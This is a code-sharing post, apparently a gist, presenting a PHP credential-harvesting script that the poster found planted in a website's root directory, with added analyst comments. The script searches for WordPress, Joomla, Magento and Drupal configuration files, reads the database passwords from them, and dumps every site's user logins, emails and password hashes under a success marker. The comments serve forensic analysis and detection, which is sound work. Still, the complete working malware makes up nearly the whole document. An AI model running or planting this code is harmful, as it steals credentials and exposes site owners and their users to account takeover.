Ideandro
1/3/2019 - 1:33 PM

WEBSITE HACK: SEL USER (PHP file)

Found it in the root directory...

<?php

     // Analyst note: this script was found dropped in a site's web root (see the
     // post above). It reads no request parameters and performs no authentication
     // check, so any plain request to it runs the whole flow below:
     //   1. work out the web root,
     //   2. findconfig() walks the path looking for CMS configuration files,
     //   3. each config is parsed for DB credentials by the matching set*User(),
     //   4. the CMS user table is read and printed as "CMS:url:login:email:hash".
     /****find config files****/
     $rootpath = "";
     // Web root from DOCUMENT_ROOT; otherwise derived from the script's own path
     // by discarding everything after the htdocs/httpdocs/www path component.
     if(isset($_SERVER["DOCUMENT_ROOT"]))
     {
        $rootpath = $_SERVER["DOCUMENT_ROOT"]; 
     } else
     {
         $rootpath = preg_replace('/(htdocs|httpdocs|www)(.*)/','$1',dirname($_SERVER["SCRIPT_FILENAME"]));
     }

     
// Split the web root into components on "/" or "\" (Windows hosts as well).
$pathArr =array();
$startPath="";
$depth=0;
$sep = "/";
if (strstr($rootpath,"/")) 
{
    $pathArr = explode("/",$rootpath);
} elseif (strstr($rootpath,"\\"))
{
    $pathArr = explode("\\",$rootpath);
    $sep = "\\";
}
$depth = count($pathArr);
// Rebuild the path one component at a time starting from the top (the last
// component is never added), scanning each prefix with a depth that shrinks by
// one per step. Stops at the first prefix that yields any config file, i.e. it
// also reaches sibling sites hosted under the same parent directory.
if($depth>=2)
{
    $startPath = $pathArr[0];
    for($i=1;$i<count($pathArr)-1;$i++)
    {
        $startPath = $startPath.$sep.$pathArr[$i];
        $configs=findconfig($startPath,$depth);
        if(count($configs))
        {
            break;
        }
        $depth--;
        
    }
} else
{
    $startPath = $rootpath;
    $configs=findconfig($startPath,$depth);
}


// Fallback: shallow (depth 2) scan of the web root itself.
if(count($configs)<=0)
{
  $configs=findconfig($rootpath,2);  
}
$addOk = false;
if(is_array($configs))
{
$configs = array_unique($configs);
    foreach($configs as $config)
    {
        try{
            
             $addedUsrs = NULL;
            $cont = file_get_contents($config);
            $cmstype = "";
         // Dispatch on the config file name; each set*User() returns either
         // an array with "url" and "data" keys or NULL.
         if (stripos($config,"wp-config.php"))
         {
             $addedUsrs=setWPUser($cont);
             $cmstype = "WORDPRESS";
                   
               
         } elseif(stripos($config,"configuration.php"))
         {
             $addedUsrs=setJMUser($cont);
             $cmstype = "JOOMLA";
             
         } elseif(stripos($config,"local.xml"))
         {
             $addedUsrs=setMGUser($cont,false);
             $cmstype = "MAGENTO";
         } elseif(stripos($config,"env.php"))
         {
             $addedUsrs=setMGUser($cont,true);
            $cmstype = "MAGENTO";
         } elseif(stripos($config,"settings.php"))
         {
             // setDPUser() is declared with a single parameter; PHP ignores
             // the extra argument for user-defined functions.
             $addedUsrs=setDPUser($cont,true);
             $cmstype = "DRUPAL";
         } 
         if(is_array($addedUsrs))
             {
                 try
                   {
                       $url = $addedUsrs["url"];
                       // When no site URL could be read, the absolute path of the
                       // config file is printed instead (leaks server paths).
                       if(empty($url))
                      {$url=$config;}
                       // Printed once, before the first credential block. This
                       // literal is a good detection string for web-server and
                       // proxy logs / response bodies; presumably whatever
                       // requests this script checks for it to mark success.
                       if(!$addOk)
                       {
                          $addOk = true;
                          echo "explOK12345" ;
                          echo "<br>";
                       }
                       // One line per account: CMS type, site URL (or path), then
                       // the "login:email:hash" string built by the set*User() call.
                       if(is_array($addedUsrs["data"]))
                       {
                          foreach ($addedUsrs["data"] as $usr)
                       {
                           echo $cmstype.":".$url.":".$usr."<br>";
                       } 
                       }
                       
                       
                   }catch(Exception $e)
                   { echo $e->getMessage();}
                  // echo "<br>";
                 
             }
        }catch(Exception $e)
        {;} // errors while reading or parsing one config are silently skipped
       
        
    }
    
}

// Self-deletion is commented out in this variant, so the file stays on disk
// and is available for forensic collection.
//unlink($_SERVER["SCRIPT_FILENAME"]);
 
 // Config search (original comment was in Russian: "поиск конфигов").
 /**
  * Recursively searches $source, up to $depth directory levels, for CMS
  * configuration files and returns their resolved paths.
  *
  * Matching is by name only, no content check:
  *   - configuration.php (Joomla) and wp-config.php (WordPress) files;
  *   - inside any directory whose path contains "app/etc" (Magento): env.php,
  *     or local.xml if there is no env.php;
  *   - inside any directory whose path contains "sites/default" (Drupal):
  *     settings.php.
  *
  * @param string $source directory to start from
  * @param int    $depth  maximum recursion depth passed to setMaxDepth()
  * @return string[] matching paths; empty when nothing matched or on error
  */
 function findconfig($source,$depth)
{

    $source = str_replace('\\', '/', realpath($source));
    $result=array();
   try
   {
      if (is_dir($source) === true)
    {
        // SELF_FIRST yields a directory before its children (needed for the
        // directory-name checks below); CATCH_GET_CHILD skips subdirectories
        // that cannot be opened instead of aborting the whole walk.
        $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source,RecursiveDirectoryIterator::KEY_AS_PATHNAME), RecursiveIteratorIterator::SELF_FIRST,RecursiveIteratorIterator::CATCH_GET_CHILD);
        $files->setMaxDepth($depth);
        foreach ($files as $file => $fileInfo)
        {
            try{
                $file = str_replace('\\', '/', $file);
                $file2 = $file; // un-resolved path, used for the substring checks
            if( in_array(substr($file, strrpos($file, '/')+1), array('.', '..')) )
                continue;
            $file = realpath($file);
            
            if ((is_file($file) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
            {
               $result[]=$file;
                
            } elseif(is_dir($file)&&strstr($file2,"app/etc"))
            {
                // Magento: prefer env.php (Magento 2), else local.xml (Magento 1).
                if(file_exists(realpath($file."/env.php")))
                {
                   $result[]=  realpath($file."/env.php");
                }
                elseif(file_exists(realpath($file."/local.xml")))
                {
                   $result[]= realpath($file."/local.xml");
                } 
                
            }elseif(is_dir($file)&&strstr($file2,"sites/default"))
            {
                // Drupal: settings.php.
                if(file_exists(realpath($file."/settings.php")))
                {
                   $result[]=  realpath($file."/settings.php");
                }
                
            }
            }catch(Exception $iterex)
            {
                ; // a single unreadable entry is ignored; the walk continues
            }
        }
    }
    // NOTE(review): the branches below run when $source is not a directory, but
    // $file and $file2 are only assigned inside the foreach above, so here they
    // are undefined; these branches appear to be dead code copied from the loop.
    elseif ((is_file($source) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
    {
        
        $result[]=$file;
    } elseif(is_dir($file)&&stristr($file,"app/etc"))
    {
        if(file_exists(realpath($file."/env.php")))
                {
                    $result[]= realpath($file."/env.php");
                }
                elseif(file_exists(realpath($file."/local.xml")))
                {
                   $result[]= realpath($file."/local.xml");
                } 
    }elseif(is_dir($file)&&strstr($file2,"sites/default"))
            {
                // Drupal: settings.php (same as in the loop above).
                if(file_exists(realpath($file."/settings.php")))
                {
                   $result[]=  realpath($file."/settings.php");
                }
                
            }
   } catch (Exception $e) {
       ; // any other failure yields whatever was collected so far
    }
    
    

  
  return $result;
}

  
  /**
   * Reads DB credentials from a WordPress wp-config.php and dumps its users.
   *
   * Parses define('NAME', 'value') pairs (single-quoted only) and picks
   * DB_NAME / DB_USER / DB_PASSWORD / DB_HOST by case-insensitive substring
   * match, plus $table_prefix. Database access goes through the legacy
   * ext/mysql functions behind a function_exists() guard; on PHP 7+ (where
   * ext/mysql no longer exists) nothing is queried and NULL is returned.
   *
   * @param string $cont raw contents of wp-config.php
   * @return array{url:string,data:string[]}|null "url" is the siteurl option
   *         ("" if that query fails); "data" holds one
   *         "user_login:user_email:user_pass" string per row of {prefix}users,
   *         user_pass being the stored password hash. NULL (implicit) on any
   *         parse, connection or query failure, or when the table is empty.
   */
  function setWPUser($cont)
  {
      $db_name = NULL;
        $db_user = NULL;
        $db_pass = NULL;
        $db_host= NULL;
        $tbl_preffix="";
        $db_preffix="";
        $uri="";
      // $matches[2] = constant names, $matches[4] = their values.
      preg_match_all('/(define\(\')([^\']+)(\',\s*\')([^\']+)/', $cont, $matches);
        if(is_array($matches))
{
    for($i=0;$i<count($matches[2]);$i++)
{
    if(stristr($matches[2][$i],"DB_NAME"))
    {$db_name=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"db_user"))
    {$db_user=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"db_password"))
    {$db_pass=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"db_host"))
    {$db_host=$matches[4][$i];}
    
}
if(!empty($db_name))
{
    // $table_prefix = 'wp_'; -> $mpreffix[2]
    preg_match('/(\$table_prefix\s*=\s*\')([^\']+)/', $cont, $mpreffix);
    if(is_array($mpreffix)&&count($mpreffix)==3)
    {$tbl_preffix=$mpreffix[2];}
    // Legacy ext/mysql only; the @ hides connection warnings from the output.
    if(function_exists('mysql_connect')){
    if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
    if(mysql_select_db($db_name,$con_mss))
    {
        // Site URL from the options table; the table name is built from the
        // prefix read out of the config file above.
        $result =  mysql_query ("SELECT option_value FROM ".$tbl_preffix."options where option_name='siteurl' ", $con_mss);
        if($result)
        {
           $row = mysql_fetch_row($result);
           if(is_array($row)&&count($row)>0)
           $uri=trim($row[0]);
           
        }
        
        $ErrorMsg = "";
        $result2 =  mysql_query ("SELECT user_login,user_email,user_pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg  =  mysql_error();
if  (!$ErrorMsg){
  if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
  $usrArray[] = $row[0].":".$row[1].":".$row[2];
}
  return Array("url"=>$uri,"data"=>$usrArray)  ;     
}
}

        
        
    }
    }
}
}
}
  }
  
  /**
   * Reads DB credentials from a Joomla configuration.php and dumps its users.
   *
   * Parses "$name = 'value';" assignments (single-quoted only) and picks
   * $db / $user / $password / $host / $dbprefix / $sitename by case-insensitive
   * substring match on the captured "$name = '" prefix. Database access uses
   * the legacy ext/mysql functions behind a function_exists() guard, so on
   * PHP 7+ nothing is queried and NULL is returned.
   *
   * @param string $cont raw contents of configuration.php
   * @return array{url:string,data:string[]}|null "url" is actually the
   *         $sitename value from the config (a display name, not a URL);
   *         "data" holds one "username:email:password" string per row of
   *         {prefix}users, password being the stored hash. NULL (implicit) on
   *         any parse, connection or query failure, or when the table is empty.
   */
  function setJMUser($cont)
  {
      $db_name = NULL;
        $db_user = NULL;
        $db_pass = NULL;
        $db_host= NULL;
        $tbl_preffix="";
        $uri="";
// $matches[1] = "$name = '" prefix, $matches[2] = the quoted value.
preg_match_all('/(\$\w+\s*=\s*\')([^\']+)(\'\s*\;)/', $cont, $matches);
                if(is_array($matches))
{
    for($i=0;$i<count($matches[1]);$i++)
{
    // The trailing space in "$db " / "$user " keeps "$db" from matching
    // "$dbprefix"; it also means an assignment written without a space
    // before "=" (e.g. "$db='x';") is not recognised.
    if(stristr($matches[1][$i],"\$db "))
    {$db_name=$matches[2][$i];}
    elseif(stristr($matches[1][$i],"\$user "))
    {$db_user=$matches[2][$i];}
    elseif(stristr($matches[1][$i],"\$password"))
    {$db_pass=$matches[2][$i];}
    elseif(stristr($matches[1][$i],"\$host"))
    {$db_host=$matches[2][$i];}
    elseif(stristr($matches[1][$i],"\$dbprefix"))
    {$tbl_preffix=$matches[2][$i];}
    elseif(stristr($matches[1][$i],"\$sitename"))
    {$uri=$matches[2][$i];}
    
}
if(!empty($db_name))
{
    // Legacy ext/mysql only; the @ hides connection warnings from the output.
    if(function_exists('mysql_connect')){
        if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
            if(mysql_select_db($db_name,$con_mss))
            {
             
        $ErrorMsg = "";
               $result2 =  mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg  =  mysql_error();
if  (!$ErrorMsg){
  if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
  $usrArray[] = $row[0].":".$row[1].":".$row[2];
}
  return Array("url"=>$uri,"data"=>$usrArray)  ;     
}
}
        
       
        
            }
        }
    }
}
}
  }
  
  /**
   * Reads DB credentials from a Magento config and dumps its admin users.
   *
   * Two input formats:
   *   - $ismg2 false and $cont starts with an XML declaration: Magento 1
   *     app/etc/local.xml, read with SimpleXMLElement
   *     (global/resources/default_setup/connection/* and db/table_prefix);
   *   - $ismg2 true and $cont contains "'host' =>": Magento 2 app/etc/env.php,
   *     parsed as 'key' => 'value' pairs (dbname / username / password / host /
   *     table_prefix by case-insensitive substring match on the key).
   * Database access uses the legacy ext/mysql functions behind a
   * function_exists() guard, so on PHP 7+ nothing is queried and NULL is
   * returned.
   *
   * @param string $cont  raw contents of local.xml or env.php
   * @param bool   $ismg2 true for env.php (Magento 2), false for local.xml
   * @return array{url:string,data:string[]}|null "url" is the
   *         web/unsecure/base_url value from core_config_data ("" if that
   *         query fails); "data" holds one "username:email:password" string per
   *         row of {prefix}admin_user, password being the stored hash. NULL
   *         (implicit) on any parse, connection or query failure, or when the
   *         table is empty.
   */
  function setMGUser($cont,$ismg2)
  {
        $db_name = NULL;
        $db_user = NULL;
        $db_pass = NULL;
        $db_host= NULL;
        $tbl_preffix="";
        $uri="";
        $roletbl=""; // unused
        
     if(!$ismg2&&stristr($cont,"<?xml version"))
     {
        // NOTE(review): these are SimpleXMLElement nodes, not strings; they are
        // passed as-is to the mysql_* calls below, which presumably coerce them.
        $dbdata = new SimpleXMLElement($cont);
        $db_name = $dbdata->global->resources->default_setup->connection->dbname; 
        $db_user = $dbdata->global->resources->default_setup->connection->username;
        $db_pass = $dbdata->global->resources->default_setup->connection->password;
        $db_host= $dbdata->global->resources->default_setup->connection->host;
        $tbl_preffix=$dbdata->global->resources->db->table_prefix; 
        
     } elseif($ismg2&&stristr($cont,"'host' =>"))
     {
         //'host' => 'localhost',
     // $matches[2] = keys, $matches[4] = values.
     preg_match_all('/(\')(\w+)(\'\s*\=\>\s*\')([^\']+)/', $cont, $matches);
        if(is_array($matches))
{
    for($i=0;$i<count($matches[2]);$i++)
{
    if(stristr($matches[2][$i],"dbname"))
    {$db_name=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"username"))
    {$db_user=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"password"))
    {$db_pass=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"host"))
    {$db_host=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"table_prefix"))
    {$tbl_preffix=$matches[4][$i];}
    
}
     }
     
     }
        if(!is_null($db_name)&&!empty($db_name))
{
    // Legacy ext/mysql only; the @ hides connection warnings from the output.
    if(function_exists('mysql_connect')){
        if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
            if(mysql_select_db($db_name,$con_mss))
            {
                // Store base URL; the table name uses the prefix from the config.
                $result =  mysql_query ("SELECT value FROM ".$tbl_preffix."core_config_data where path='web/unsecure/base_url' ", $con_mss);
        if($result)
        {
           $row = mysql_fetch_row($result);
           if(is_array($row)&&count($row)>0)
           $uri=trim($row[0]);
           
        }
                
        $ErrorMsg = "";
                $result2 =  mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."admin_user", $con_mss) or $ErrorMsg  =  mysql_error();
if  (!$ErrorMsg){
  if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
  $usrArray[] = $row[0].":".$row[1].":".$row[2];
}
  return Array("url"=>$uri,"data"=>$usrArray)  ;     
}
}
        
            }
        }
    }
}
        



  }
  
  /**
   * Reads DB credentials from a Drupal sites/default/settings.php and dumps
   * its users.
   *
   * Parses 'key' => 'value' pairs that start a line (after leading whitespace)
   * and picks database / username / password / host / prefix by case-insensitive
   * substring match on the key. Database access uses the legacy ext/mysql
   * functions behind a function_exists() guard, so on PHP 7+ nothing is
   * queried and NULL is returned. Declared with one parameter; the caller in
   * this file passes a second argument, which PHP ignores.
   *
   * @param string $cont raw contents of settings.php
   * @return array{url:mixed,data:string[]}|null "url" is the unserialize()d
   *         site_name row of {prefix}variable ("" if that query fails); "data"
   *         holds one "name:mail:pass" string per row of {prefix}users, or of
   *         {prefix}users_field_data when the first query errors (newer Drupal
   *         schema), pass being the stored hash. NULL (implicit) on any parse,
   *         connection or query failure, or when the table is empty.
   */
  function setDPUser($cont)
  {
        $db_name = NULL;
        $db_user = NULL;
        $db_pass = NULL;
        $db_host= NULL;
        $tbl_preffix="";
        $uri="";
        $roletbl=""; // unused
        
if(stristr($cont,"'host' =>"))
     {
         //'host' => 'localhost',
     // Anchored at line start so only indented "'key' => 'value'," lines match.
     // $matches[2] = keys, $matches[4] = values.
     preg_match_all('/^(\s+\')(\w+)(\'\s*\=\>\s*\')([^\']+)/m', $cont, $matches);
        if(is_array($matches))
{
    for($i=0;$i<count($matches[2]);$i++)
{
    if(stristr($matches[2][$i],"database"))
    {$db_name=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"username"))
    {$db_user=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"password"))
    {$db_pass=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"host"))
    {$db_host=$matches[4][$i];}
    elseif(stristr($matches[2][$i],"prefix"))
    {$tbl_preffix=$matches[4][$i];}
    
}
     }
     
     }
        if(!is_null($db_name)&&!empty($db_name))
{
    // Legacy ext/mysql only; the @ hides connection warnings from the output.
    if(function_exists('mysql_connect')){
        if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
            if(mysql_select_db($db_name,$con_mss))
            {
                $result =  mysql_query ("SELECT value FROM ".$tbl_preffix."variable where name='site_name' ", $con_mss);
        if($result)
        {
           $row = mysql_fetch_row($result);
           // The variable table stores serialized values; the only unserialize()
           // in this script, applied to data read from the victim DB.
           if(is_array($row)&&count($row)>0)
           $uri= unserialize(trim($row[0]));
           
        }
        
        $ErrorMsg = "";
                $result2 =  mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg  =  mysql_error();
                
                // If the users table query fails, retry against users_field_data
                // (the table used by the newer Drupal schema).
                if ($ErrorMsg)
                {
                    $ErrorMsg = "";
                    $result2 =  mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users_field_data", $con_mss) or $ErrorMsg  =  mysql_error();
                }
if  (!$ErrorMsg){
  if (mysql_num_rows($result2)>0){
while ($row = mysql_fetch_row($result2)){
  $usrArray[] = $row[0].":".$row[1].":".$row[2];
}
  return Array("url"=>$uri,"data"=>$usrArray)  ;     
}
}
        
       
    }
    }
}
  }
  }

?>